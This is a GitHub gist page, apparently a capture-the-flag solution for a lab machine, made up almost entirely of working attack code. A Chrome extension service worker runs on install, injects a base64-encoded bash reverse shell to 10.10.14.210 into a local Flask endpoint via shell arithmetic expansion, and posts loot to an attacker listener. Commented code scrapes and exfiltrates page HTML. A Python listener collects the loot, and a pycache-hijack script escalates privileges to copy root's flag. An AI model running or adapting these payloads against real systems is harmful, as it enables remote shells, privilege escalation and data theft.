Last active
January 30, 2026 08:45
-
-
Save sharpicx/f5c23b9e428ba3a049944eef2ba7d7dd to your computer and use it in GitHub Desktop.
Revisions
-
sharpicx revised this gist
Jan 30, 2026 . 1 changed file with 30 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,30 @@ from http.server import HTTPServer, BaseHTTPRequestHandler import base64 from pwn import log from urllib.parse import unquote class SyncHandler(BaseHTTPRequestHandler): def do_POST(self): content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length).decode('utf-8') try: raw_decoded = base64.b64decode(post_data).decode('utf-8') final_data = unquote(raw_decoded) log.success(f"Incoming from {self.client_address[0]}:") print(final_data) print() except Exception as e: log.warning(f"Decode error: {e}") self.send_response(204) self.end_headers() def log_message(self, format, *args): return if __name__ == '__main__': server_address = ('0.0.0.0', 8081) httpd = HTTPServer(server_address, SyncHandler) try: httpd.serve_forever() except KeyboardInterrupt: log.warning("Exiting...") -
Jan 30, 2026 . 1 changed file with 12 additions and 0 deletions.There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,12 @@ # insecure permission at /opt/extensiontool/__pycache__ # read this blog really helpful by @xct: https://vuln.dev/vulnlab-odori/ # # python3 -m compileall extension_utils.py --invalidation-mode unchecked-hash # sudo /opt/extensiontool/extension_tool.py # Traceback (most recent call last): # File "/opt/extensiontool/extension_tool.py", line 5, in <module> # from extension_utils import validate_manifest, clean_temp_files # ImportError: cannot import name 'validate_manifest' from 'extension_utils' (/opt/extensiontool/extension_utils.py) import os os.system("cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt") -
Jan 30, 2026 .There are no files selected for viewing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,58 @@ // https://dev.to/greymd/eq-can-be-critically-vulnerable-338m // https://ya.maya.st/d/201909a.html // https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/ // https://github.com/koalaman/shellcheck/issues/3088 chrome.runtime.onInstalled.addListener(async () => { const lhost = "10.10.14.210"; const serverPort = "8081"; const flaskAddr = "http://127.0.0.1:5000"; const revShell = "echo${IFS}L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEwLzk5OTkgMD4mMSI=|base64${IFS}-d|bash"; const payload = `xxx[$(${revShell})]`; const targetUrl = `${flaskAddr}/routines/${encodeURIComponent(payload)}`; try { await fetch(targetUrl, { mode: "no-cors" }); await fetch(`http://${lhost}:${serverPort}/loot`, { method: "POST", mode: "no-cors", body: btoa("Payload Sent to Flask: " + targetUrl), keepalive: true, }); } catch (e) { await fetch(`http://${lhost}:${serverPort}/loot`, { method: "POST", mode: "no-cors", body: btoa("Fetch Failed: " + e.toString()), keepalive: true, }); } }); // const serverAddr = "10.10.14.210"; // const serverPort = "8081"; // const targetHost = "http://browsedinternals.htb"; // async function pushData(payload) { // const b64 = btoa(unescape(encodeURIComponent(payload))); // await fetch(`http://${serverAddr}:${serverPort}/loot`, { // method: "POST", // mode: "no-cors", // body: b64, // }); // } // chrome.tabs.create({ url: targetHost, active: false }, (tab) => { // chrome.tabs.onUpdated.addListener(function listener() { // chrome.tabs.onUpdated.removeListener(listener); // chrome.scripting.executeScript( // { // target: { tabId: tab.id }, // func: () => document.documentElement.outerHTML, // }, // async (results) => { // await pushData(results[0].result); // chrome.tabs.remove(tab.id); // }, // ); // }); // }); This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters. Learn more about bidirectional Unicode charactersOriginal file line number Diff line number Diff line change @@ -0,0 +1,11 @@ { "manifest_version": 3, "name": "abc", "version": "1.0", "description": "abc", "permissions": ["tabs", "scripting", "<all_urls>"], "host_permissions": ["<all_urls>", "*://*/*"], "background": { "service_worker": "background.js" } }